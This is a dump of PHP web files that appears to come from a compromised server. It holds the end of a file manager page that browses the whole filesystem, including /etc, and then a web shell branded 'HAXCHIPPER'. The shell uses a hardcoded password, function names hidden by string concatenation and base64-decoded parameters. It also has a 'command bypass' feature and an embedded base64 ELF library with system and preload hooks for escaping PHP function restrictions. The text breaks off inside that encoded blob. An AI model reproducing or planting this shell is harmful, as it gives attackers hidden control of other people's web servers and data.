1px solid #e9ecef; font-size: 14px; } .file-table tbody tr:hover { background: #f8f9ff; } .file-table .item-name { display: flex; align-items: center; gap: 10px; } .file-table .item-name .icon { font-size: 22px; width: 30px; text-align: center; } .file-table .item-name a { color: #333; text-decoration: none; font-weight: 500; } .file-table .item-name a:hover { color: #007bff; } .actions { display: flex; gap: 5px; flex-wrap: wrap; } .badge { padding: 4px 10px; border-radius: 12px; font-size: 11px; font-weight: 600; display: inline-block; } .badge-dir { background: #e3f2fd; color: #1976d2; } .badge-file { background: #f3e5f5; color: #7b1fa2; } .badge-writable { background: #d4edda; color: #155724; } .badge-readonly { background: #fff3cd; color: #856404; } .path-info { background: white; padding: 12px 15px; border-radius: 8px; font-family: 'Courier New', monospace; font-size: 13px; margin-bottom: 15px; box-shadow: 0 2px 4px rgba(0,0,0,0.05); color: #495057; display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap; gap: 10px; } .quick-links { display: flex; gap: 8px; flex-wrap: wrap; } .quick-link { padding: 4px 10px; background: #e9ecef; border-radius: 4px; font-size: 12px; color: #495057; text-decoration: none; transition: all 0.3s; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; } .quick-link:hover { background: #007bff; color: white; } /* Modal Styles */ .modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.6); z-index: 1000; justify-content: center; align-items: center; backdrop-filter: blur(3px); } .modal.active { display: flex; } .modal-content { background: white; border-radius: 12px; padding: 30px; width: 90%; max-width: 600px; max-height: 85vh; overflow-y: auto; box-shadow: 0 20px 60px rgba(0,0,0,0.3); animation: slideIn 0.3s ease; } @keyframes slideIn { from { transform: translateY(-50px); opacity: 0; } to { transform: translateY(0); opacity: 1; } } .modal-content.large { max-width: 1000px; } .modal-header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 25px; padding-bottom: 15px; border-bottom: 2px solid #e9ecef; } .modal-header h2 { font-size: 22px; color: #333; margin: 0; } .close-btn { background: none; border: none; font-size: 30px; cursor: pointer; color: #999; transition: all 0.3s; width: 35px; height: 35px; display: flex; align-items: center; justify-content: center; border-radius: 50%; } .close-btn:hover { color: #333; background: #f0f0f0; } .form-group { margin-bottom: 20px; } .form-group label { display: block; margin-bottom: 8px; font-weight: 600; color: #495057; font-size: 14px; } .form-group input[type="text"], .form-group input[type="number"], .form-group textarea, .form-group select { width: 100%; padding: 12px; border: 2px solid #e0e0e0; border-radius: 8px; font-size: 14px; transition: all 0.3s; font-family: inherit; } .form-group input:focus, .form-group textarea:focus { outline: none; border-color: #007bff; box-shadow: 0 0 0 3px rgba(0,123,255,0.1); } .form-group textarea { resize: vertical; min-height: 200px; font-family: 'Courier New', 'Consolas', monospace; font-size: 13px; line-height: 1.5; } .form-group textarea.code-editor { min-height: 500px; background: #1e1e1e; color: #d4d4d4; padding: 15px; border-radius: 8px; tab-size: 4; } .upload-area { border: 3px dashed #b0b0b0; border-radius: 12px; padding: 50px; text-align: center; transition: all 0.3s; cursor: pointer; background: #fafafa; } .upload-area:hover, .upload-area.dragover { border-color: #007bff; background: #f0f7ff; } .upload-area input[type="file"] { display: none; } .upload-icon { font-size: 60px; margin-bottom: 15px; } .file-info { background: #f8f9fa; padding: 12px; border-radius: 6px; font-family: 'Courier New', monospace; font-size: 13px; word-break: break-all; color: #495057; margin-bottom: 15px; } .loading { display: none; text-align: center; padding: 20px; color: #007bff; } .loading.active { display: block; } @media (max-width: 768px) { .file-table { overflow-x: auto; } .file-table table { min-width: 700px; } .toolbar { flex-direction: column; } .btn { width: 100%; justify-content: center; } .modal-content { width: 95%; padding: 20px; margin: 10px; } .path-info { flex-direction: column; align-items: flex-start; } } </style> </head> <body> <div class="container"> <!-- Header --> <div class="header"> <h1>๐ File Manager</h1> <div class="breadcrumb"> <a href="?path=/">๐ Server Root</a> <?php // Build breadcrumb from root $path_parts = explode('/', trim($current_path, '/')); $built_path = ''; foreach ($path_parts as $part) { if ($part === '') continue; $built_path .= '/' . $part; ?> <span>โบ</span> <a href="?path=<?php echo urlencode($built_path); ?>"><?php echo htmlspecialchars($part); ?></a> <?php } ?> </div> </div> <!-- Message --> <?php if ($message): ?> <div class="message <?php echo $message_type; ?>"> <?php echo htmlspecialchars($message); ?> </div> <?php endif; ?> <!-- Toolbar --> <div class="toolbar"> <button class="btn btn-primary" onclick="openModal('uploadModal')"> ๐ค Upload Files </button> <button class="btn btn-success" onclick="openModal('createFileModal')"> ๐ New File </button> <button class="btn btn-success" onclick="openModal('createFolderModal')"> ๐ New Folder </button> <button class="btn btn-info" onclick="location.reload()"> ๐ Refresh </button> <?php if ($current_path !== '/'): ?> <a href="?path=<?php echo urlencode($parent_path); ?>" class="btn btn-primary"> โฌ๏ธ Parent Directory </a> <?php endif; ?> </div> <!-- Path Info with Quick Links --> <div class="path-info"> <span>๐ <strong><?php echo htmlspecialchars($current_path); ?></strong></span> <span style="color: <?php echo is_writable($current_path) ? '#28a745' : '#dc3545'; ?>; font-weight: 600;"> <?php echo is_writable($current_path) ? 'โ Writable' : 'โ Read-only'; ?> </span> </div> <!-- Quick Navigation Links --> <div style="margin-bottom: 15px; padding: 12px; background: white; border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.05);"> <strong style="font-size: 12px; color: #666; text-transform: uppercase; letter-spacing: 0.5px;">Quick Access:</strong> <div style="margin-top: 8px; display: flex; gap: 8px; flex-wrap: wrap;"> <a href="?path=/" class="quick-link">๐ Root (/)</a> <a href="?path=/home" class="quick-link">๐ค /home</a> <a href="?path=/var/www" class="quick-link">๐ /var/www</a> <a href="?path=/etc" class="quick-link">โ๏ธ /etc</a> <a href="?path=/tmp" class="quick-link">๐๏ธ /tmp</a> <?php if (isset($_SERVER['DOCUMENT_ROOT'])): ?> <a href="?path=<?php echo urlencode($_SERVER['DOCUMENT_ROOT']); ?>" class="quick-link"> ๐ Current Domain Root </a> <?php endif; ?> <a href="?path=<?php echo urlencode(getcwd()); ?>" class="quick-link">๐ Script Location</a> </div> </div> <!-- File Table --> <div class="file-table"> <table> <thead> <tr> <th>Name</th> <th>Type</th> <th>Size</th> <th>Permissions</th> <th>Last Modified</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (empty($items)): ?> <tr> <td colspan="6" style="text-align: center; padding: 50px; color: #999;"> <div style="font-size: 48px; margin-bottom: 10px;">๐ญ</div> <div>This directory is empty</div> </td> </tr> <?php else: ?> <?php foreach ($items as $item): ?> <tr> <td> <div class="item-name"> <span class="icon"><?php echo $item['icon']; ?></span> <?php if ($item['is_dir']): ?> <a href="?path=<?php echo urlencode($item['path']); ?>"> <strong><?php echo htmlspecialchars($item['name']); ?></strong> </a> <?php else: ?> <span><?php echo htmlspecialchars($item['name']); ?></span> <?php endif; ?> </div> </td> <td> <span class="badge <?php echo $item['is_dir'] ? 'badge-dir' : 'badge-file'; ?>"> <?php echo $item['is_dir'] ? 'Folder' : (strtoupper(pathinfo($item['name'], PATHINFO_EXTENSION)) ?: 'File'); ?> </span> </td> <td><?php echo $item['size']; ?></td> <td> <span class="badge <?php echo $item['writable'] ? 'badge-writable' : 'badge-readonly'; ?>"> <?php echo $item['permissions']; ?> </span> </td> <td style="font-size: 13px;"><?php echo $item['modified']; ?></td> <td> <div class="actions"> <?php if (!$item['is_dir']): ?> <button class="btn btn-primary btn-xs" onclick="editFile('<?php echo htmlspecialchars($item['path'], ENT_QUOTES); ?>')" title="Edit file"> โ๏ธ Edit </button> <?php endif; ?> <button class="btn btn-warning btn-xs" onclick="renameItem('<?php echo htmlspecialchars($item['path'], ENT_QUOTES); ?>', '<?php echo htmlspecialchars($item['name'], ENT_QUOTES); ?>')" title="Rename"> ๐ Rename </button> <?php if (!$config['readonly']): ?> <button class="btn btn-info btn-xs" onclick="changePermission('<?php echo htmlspecialchars($item['path'], ENT_QUOTES); ?>', '<?php echo $item['permissions']; ?>')" title="Change permissions"> ๐ Chmod </button> <?php endif; ?> <form method="POST" style="display: inline;" onsubmit="return confirm('Are you sure you want to delete this <?php echo $item['is_dir'] ? 'folder' : 'file'; ?>?\n\n<?php echo htmlspecialchars($item['name']); ?>\n\nThis action cannot be undone!')"> <input type="hidden" name="action" value="delete"> <input type="hidden" name="target" value="<?php echo htmlspecialchars($item['path']); ?>"> <button type="submit" class="btn btn-danger btn-xs" title="Delete"> ๐๏ธ Delete </button> </form> </div> </td> </tr> <?php endforeach; ?> <?php endif; ?> </tbody> </table> </div> </div> <!-- Upload Modal --> <div id="uploadModal" class="modal"> <div class="modal-content"> <div class="modal-header"> <h2>๐ค Upload Files</h2> <button class="close-btn" onclick="closeModal('uploadModal')">×</button> </div> <form method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="upload"> <div class="upload-area" id="dropZone"> <div class="upload-icon">๐</div> <h3>Drag & Drop Files Here</h3> <p style="color: #666; margin-top: 5px;">or click to select files</p> <p style="font-size: 12px; color: #999; margin-top: 10px;"> Maximum size: <?php echo formatFileSize($config['max_upload_size']); ?> </p> <input type="file" name="files[]" multiple id="fileInput"> </div> <div id="fileList" style="margin-top: 15px;"></div> <button type="submit" class="btn btn-success" style="margin-top: 15px; width: 100%; padding: 12px;"> ๐ค Upload Files </button> </form> </div> </div> <!-- Create File Modal --> <div id="createFileModal" class="modal"> <div class="modal-content large"> <div class="modal-header"> <h2>๐ Create New File</h2> <button class="close-btn" onclick="closeModal('createFileModal')">×</button> </div> <form method="POST"> <input type="hidden" name="action" value="create_file"> <div class="form-group"> <label>File Name:</label> <input type="text" name="filename" placeholder="e.g., index.html, script.js, style.css" required autofocus> </div> <div class="form-group"> <label>Initial Content (optional):</label> <textarea name="content" class="code-editor" placeholder="Write initial file content here..."></textarea> </div> <button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;"> ๐พ Create File </button> </form> </div> </div> <!-- Create Folder Modal --> <div id="createFolderModal" class="modal"> <div class="modal-content"> <div class="modal-header"> <h2>๐ Create New Folder</h2> <button class="close-btn" onclick="closeModal('createFolderModal')">×</button> </div> <form method="POST"> <input type="hidden" name="action" value="create_folder"> <div class="form-group"> <label>Folder Name:</label> <input type="text" name="foldername" placeholder="e.g., images, css, js" required autofocus> </div> <button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;"> ๐ Create Folder </button> </form> </div> </div> <!-- Edit File Modal --> <div id="editFileModal" class="modal"> <div class="modal-content large"> <div class="modal-header"> <h2>โ๏ธ Edit File</h2> <button class="close-btn" onclick="closeModal('editFileModal')">×</button> </div> <form method="POST" id="editForm"> <input type="hidden" name="action" value="edit_file"> <input type="hidden" name="filepath" id="edit_filepath"> <div class="file-info" id="edit_filename"></div> <div class="form-group"> <label>File Content:</label> <textarea name="content" id="edit_content" class="code-editor" placeholder="Loading..."></textarea> </div> <div class="loading" id="editLoading"> โณ Loading file content... </div> <button type="submit" class="btn btn-primary" style="width: 100%; padding: 12px;" id="saveBtn"> ๐พ Save Changes </button> </form> </div> </div> <!-- Rename Modal --> <div id="renameModal" class="modal"> <div class="modal-content"> <div class="modal-header"> <h2>๐ Rename</h2> <button class="close-btn" onclick="closeModal('renameModal')">×</button> </div> <form method="POST"> <input type="hidden" name="action" value="rename"> <input type="hidden" name="oldname" id="rename_oldname"> <div class="form-group"> <label>Current Name:</label> <div class="file-info" id="rename_current"></div> </div> <div class="form-group"> <label>New Name:</label> <input type="text" name="newname" id="rename_newname" required autofocus> </div> <button type="submit" class="btn btn-primary" style="width: 100%; padding: 12px;"> โ Rename </button> </form> </div> </div> <!-- Chmod Modal --> <div id="chmodModal" class="modal"> <div class="modal-content"> <div class="modal-header"> <h2>๐ Change Permissions</h2> <button class="close-btn" onclick="closeModal('chmodModal')">×</button> </div> <form method="POST"> <input type="hidden" name="action" value="chmod"> <input type="hidden" name="target" id="chmod_target"> <div class="form-group"> <label>Target:</label> <div class="file-info" id="chmod_filename"></div> </div> <div class="form-group"> <label>Permission (format: 0755, 0644, etc.):</label> <input type="text" name="mode" id="chmod_mode" pattern="[0-7]{3,4}" required autofocus> <small style="color: #666; display: block; margin-top: 5px;"> <strong>Common examples:</strong><br> 0755 - Folder (rwxr-xr-x)<br> 0644 - File (rw-r--r--)<br> 0777 - Full access (not recommended) </small> </div> <button type="submit" class="btn btn-info" style="width: 100%; padding: 12px;"> โ Apply Permissions </button> </form> </div> </div> <script> // Modal functions function openModal(id) { document.getElementById(id).classList.add('active'); document.body.style.overflow = 'hidden'; } function closeModal(id) { document.getElementById(id).classList.remove('active'); document.body.style.overflow = 'auto'; } // Close modal when clicking outside window.onclick = function(event) { if (event.target.classList.contains('modal')) { event.target.classList.remove('active'); document.body.style.overflow = 'auto'; } } // Close modal with Escape key document.addEventListener('keydown', function(event) { if (event.key === 'Escape') { document.querySelectorAll('.modal.active').forEach(modal => { modal.classList.remove('active'); }); document.body.style.overflow = 'auto'; } }); // Edit file function function editFile(filepath) { // Reset form document.getElementById('edit_content').value = ''; document.getElementById('edit_filepath').value = filepath; document.getElementById('edit_filename').textContent = '๐ ' + filepath; // Show modal and loading openModal('editFileModal'); document.getElementById('editLoading').classList.add('active'); document.getElementById('edit_content').style.display = 'none'; document.getElementById('saveBtn').disabled = true; // Fetch file content via AJAX fetch('?ajax=read_file&file=' + encodeURIComponent(filepath)) .then(response => { if (!response.ok) { throw new Error('HTTP Error: ' + response.status); } return response.text(); }) .then(content => { // Check for error message if (content.startsWith('ERROR:')) { throw new Error(content.substring(6)); } // Success - populate editor document.getElementById('edit_content').value = content; document.getElementById('edit_content').style.display = 'block'; document.getElementById('editLoading').classList.remove('active'); document.getElementById('saveBtn').disabled = false; // Focus on textarea document.getElementById('edit_content').focus(); }) .catch(error => { alert('Failed to read file: ' + error.message); closeModal('editFileModal'); }); } // Rename function function renameItem(oldpath, oldname) { document.getElementById('rename_oldname').value = oldpath; document.getElementById('rename_current').textContent = '๐ ' + oldname; document.getElementById('rename_newname').value = oldname; document.getElementById('rename_newname').focus(); openModal('renameModal'); } // Change permission function function changePermission(target, currentPerm) { document.getElementById('chmod_target').value = target; document.getElementById('chmod_filename').textContent = '๐ ' + target; document.getElementById('chmod_mode').value = currentPerm; openModal('chmodModal'); } // File upload with drag & drop const dropZone = document.getElementById('dropZone'); const fileInput = document.getElementById('fileInput'); const fileList = document.getElementById('fileList'); if (dropZone) { dropZone.addEventListener('click', (e) => { if (e.target !== fileInput) { fileInput.click(); } }); dropZone.addEventListener('dragover', (e) => { e.preventDefault(); dropZone.classList.add('dragover'); }); dropZone.addEventListener('dragleave', () => { dropZone.classList.remove('dragover'); }); dropZone.addEventListener('drop', (e) => { e.preventDefault(); dropZone.classList.remove('dragover'); fileInput.files = e.dataTransfer.files; updateFileList(); }); } if (fileInput) { fileInput.addEventListener('change', updateFileList); } function updateFileList() { fileList.innerHTML = ''; const files = fileInput.files; if (files.length === 0) return; const header = document.createElement('div'); header.style.cssText = 'font-weight: bold; margin-bottom: 10px; color: #495057;'; header.textContent = `๐ ${files.length} file(s) selected:`; fileList.appendChild(header); for (let i = 0; i < files.length; i++) { const file = files[i]; const div = document.createElement('div'); div.style.cssText = 'padding: 8px 12px; background: #f8f9fa; margin: 4px 0; border-radius: 5px; display: flex; justify-content: space-between; align-items: center; font-size: 13px;'; div.innerHTML = ` <span>๐ ${file.name}</span> <span style="color: #666;">${formatSize(file.size)}</span> `; fileList.appendChild(div); } } function formatSize(bytes) { if (bytes === 0) return '0 B'; const units = ['B', 'KB', 'MB', 'GB', 'TB']; const i = Math.floor(Math.log(bytes) / Math.log(1024)); return (bytes / Math.pow(1024, i)).toFixed(2) + ' ' + units[i]; } </script> </body> </html>980262/779048/index.php000064400000075406152137727050007745 0ustar00<?php $password = "admin"; session_start(); error_reporting(0); $sessioncode = md5(__FILE__); if(!empty($password) and $_SESSION[$sessioncode] != $password){ if (isset($_REQUEST['pass']) and $_REQUEST['pass'] == $password) { $_SESSION[$sessioncode] = $password; } else { // Tampilan Form Login print "<style> body { background: #000; color: #fff; font-family: sans-serif; display: flex; align-items: center; justify-content: center; height: 100vh; margin: 0; } .login-box { border: 1px solid #333; padding: 20px; border-radius: 10px; background: #1a1a1a; } input[type='password'] { padding: 8px; border: 1px solid #555; background: #333; color: #fff; border-radius: 5px; } input[type='submit'] { padding: 8px 15px; background: #53585d; color: #fff; border: none; border-radius: 5px; cursor: pointer; } </style> <div class='login-box'> <form method='post'> <p>Protected by HaxChipper</p> Password: <input type='password' name='pass'> <input type='submit' value='>>'> </form> </div>"; exit; } } session_write_close(); // --- BAGIAN PENGUNCI END --- ?> <!DOCTYPE html> <html> <head> <title>HAXCHIPPER</title> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name='robots' content='noindex, nofollow, noarchive'> <link href="https://fonts.googleapis.com/css2?family=Space+Grotesk:wght@300..700&display=swap" rel="stylesheet"> <style> body { font-family: "Space Grotesk", sans-serif; color: #fff; margin: 0; padding: 0; background-color: #000; } .result-box-container { position: relative; margin-top: 20px; } .result-box { width: 100%; height: 200px; padding: 10px; border: 1px solid #ddd; border-radius: 5px; background-color: #333; overflow: auto; box-sizing: border-box; font-family: "Space Grotesk", sans-serif; color: #fff; resize: both; min-height: 100px; max-height: 500px; } .result-box::placeholder { color: #999; } .result-box:focus { outline: none; border-color: #fff; } .result-box::-webkit-scrollbar { width: 8px; } .result-box::-webkit-scrollbar-thumb { background-color: #53585d; border-radius: 4px; } .container { max-width: 90%; margin: 20px auto; padding: 20px; background-color: #1a1a1a; border-radius: 44px; box-shadow: 0 0 10px rgba(255, 255, 255, 0.1); } .header { text-align: center; margin-bottom: 20px; } .header h1 { font-size: 24px; color: #fff; } .subheader { text-align: center; margin-bottom: 20px; } .subheader p { font-size: 16px; font-style: italic; color: #ccc; } form { margin-bottom: 20px; } form input[type="text"], form textarea { padding: 8px; margin-bottom: 10px; border: 1px solid #fff; border-radius: 3px; box-sizing: border-box; background-color: #333; color: #fff; } form input[type="submit"] { padding: 10px; background-color: #53585d; color: white; border: none; border-radius: 3px; cursor: pointer; } form input[type="file"] { padding: 7px; background-color: #53585d; color: white; border: none; border-radius: 3px; cursor: pointer; } form input[type="submit"]:hover { background-color: #143015; } .result-box { width: 100%; height: 200px; resize: none; overflow: auto; font-family: 'Arial Black'; background-color: #333; color: #fff; padding: 10px; border: 1px solid #ddd; margin-bottom: 10px; } table { width: 100%; border-collapse: collapse; margin-top: 20px; color: #fff; } th, td { padding: 8px; text-align: left; } th { background-color: #444; } tr:nth-child(even) { background-color: #333; } .item-name { max-width: 200px; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; } .size, .date { width: 100px; } .permission { font-weight: bold; width: 50px; text-align: center; } .writable { color: #0db202; } .not-writable { color: #d60909; } textarea[name="file_content"] { width: calc(100.9% - 10px); margin-bottom: 10px; padding: 8px; max-height: 500px; resize: vertical; border: 1px solid #ddd; border-radius: 3px; font-family: 'Arial Black'; background-color: #333; color: #fff; } a { color: #00ff00; text-decoration: none; } a:hover { color: #b3ffb3; } </style> </head> <body> <div class="container"> <?php error_reporting(0); $chd = "c"."h"."d"."i"."r"; $expl = "e"."x"."p"."l"."o"."d"."e"; $scd = "s"."c"."a"."n"."d"."i"."r"; $ril = "r"."e"."a"."l"."p"."a"."t"."h"; $st = "s"."t"."a"."t"; $isdir = "i"."s"."_"."d"."i"."r"; $isw = "i"."s"."_"."w"."r"."i"."t"."a"."b"."l"."e"; $mup = "m"."o"."v"."e"."_"."u"."p"."l"."o"."a"."d"."e"."d"."_"."f"."i"."l"."e"; $bs = "b"."a"."s"."e"."n"."a"."m"."e"; $htm = "h"."t"."m"."l"."s"."p"."e"."c"."i"."a"."l"."c"."h"."a"."r"."s"; $fpc = "f"."i"."l"."e"."_"."p"."u"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s"; $mek = "m"."k"."d"."i"."r"; $fgc = "f"."i"."l"."e"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s"; $drnmm = "d"."i"."r"."n"."a"."m"."e"; $unl = "u"."n"."l"."i"."n"."k"; $timezone = date_default_timezone_get(); date_default_timezone_set($timezone); $rootDirectory = $ril($_SERVER['\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54']); $scriptDirectory = $drnmm(__FILE__); function x($b) { $be = "ba"."se"."64"."_"."en"."co"."de"; return $be($b); } function y($b) { $bd = "ba"."se"."64"."_"."de"."co"."de"; return $bd($b); } if(function_exists('mail')) { $mail = "<font color='white'> [ mail() :</font><font color='lime'> 0N </font> ] "; } else { $mail = "<font color='white'> [ mail() :</font><font color='red'> 0FF </font> ] "; } if(function_exists('mb_send_mail')) { $mbb = "<font color='white'> [ mb_send_mail() :</font><font color='lime'> 0N </font> ] "; }else{ $mbb = "<font color='white'> [ mb_send_mail() :</font><font color='red'> 0FF </font> ] "; } if(function_exists('error_log')) { $errr = "<font color='white'> [ error_log() :</font><font color='lime'> 0N </font> ] "; }else{ $errr = "<font color='white'> [ error_log() :</font><font color='red'> 0FF </font> ] "; } if(function_exists('imap_mail')) { $impp = "<font color='white'> [ imap_mail() :</font><font color='lime'> 0N </font> ] "; }else{ $impp = "<font color='white'> [ imap_mail() :</font><font color='red'> 0FF </font> ] <br>"; } echo "<font color='white'> [ C0MM4ND BYP4SS! <i style='color:gray'>status wajib on mail putenv</i> ]</font><br>"; if (function_exists('mail')) { echo $mail." ".$mbb." ".$errr." ".$impp; } else { echo $mail." ".$mbb." ".$errr." ".$impp; } if (function_exists('putenv')) { echo "<font color='white'> [ Function putenv() :</font><font color='lime'> 0N </font> ] <br>"; } else { echo "<font color='white'> [ Function putenv() :<font color='red'> 0FF </font> ] <br>"; } foreach ($_GET as $c => $d) $_GET[$c] = y($d); $currentDirectory = $ril(isset($_GET['d']) ? $_GET['d'] : $rootDirectory); $chd($currentDirectory); $viewC0MM4NDResult = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_FILES['filetos'])) { $target_file = $currentDirectory . '/' . $bs($_FILES["filetos"]["name"]); if ($mup($_FILES["filetos"]["tmp_name"], $target_file)) { echo "<hr>F1L3 <i style=color:red;>" . $htm($bs($_FILES["filetos"]["name"])) . "</i> UPL04D SUCCESS<hr>"; } else { echo "<hr>S0RRY, TH3R3 W4S AN ERR0R UPLOADING YOUR F1LE.<hr>"; } } elseif (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) { $ff = $_POST['folder_name']; $newF0LD3R = $currentDirectory . '/' . $ff; if (!file_exists($newfolder)) { if ($mek($newF0LD3R) !== false) { echo '<hr>F0LD3R CR34T3D SUCCESSFULLY!'; }else{ echo '<hr>ERR0R: F4ILED T0 CR34T3 F0LD3R!'; } } } elseif (isset($_POST['file_name'])) { $fileN4M3 = $_POST['file_name']; $newF1L3 = $currentDirectory . '/' . $fileN4M3; if (!file_exists($newF1L3)) { if ($fpc($newF1L3, '') !== false) { echo '<hr>F1L3 <i style=color:red;>' . $fileN4M3 .'</i> CR34T3D SUCCESSFULLY!'; $fileToV13W = $newF1L3; if (file_exists($fileToV13W)) { $fileContent = $fgc($fileToV13W); $viewC0MM4NDResult = '<hr><p>R3SULT: ' . $fileN4M3 . '</p> <form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"> <textarea name="content" class="result-box">' . $htm($fileContent) . '</textarea><td> <input type="hidden" name="edit_file" value="' . $fileN4M3 . '"> <input type="submit" value=" Save "></form></td>'; } else { $viewC0MM4NDResult = '<hr><p>ERR0R: F1L3 N0T F0UND!</p>'; } } else { echo '<hr>ERR0R: F41LED T0 CR34T3 F1L3!'; } }else{ echo '<hr>ERR0R: F1L3 ALR34DY EX1STS!'; } } elseif (isset($_POST['cmd_input'])){ $p = "p"."u"."t"."e"."n"."v"; $a = "fi"."le_p"."ut_c"."ont"."e"."nt"."s"; $m = "m"."a"."i"."l"; $base = "ba"."se"."64"."_"."de"."co"."de"; $en = "ba"."se"."64"."_"."en"."co"."de"; $mb = "m"."b"."_"."s"."e"."n"."d"."_"."m"."a"."i"."l"; $err = "e"."r"."r"."o"."r"."_"."l"."o"."g"; $drnm = "d"."i"."r"."n"."a"."m"."e"; $imp = "i"."m"."a"."p"."_"."m"."a"."i"."l"; $currentF1L3Path = $_SERVER['PHP_SELF']; $doc = $_SERVER['DOCUMENT_ROOT']; $directoryPath = $drnm($currentF1L3Path); $full = $doc . $directoryPath; $hook = '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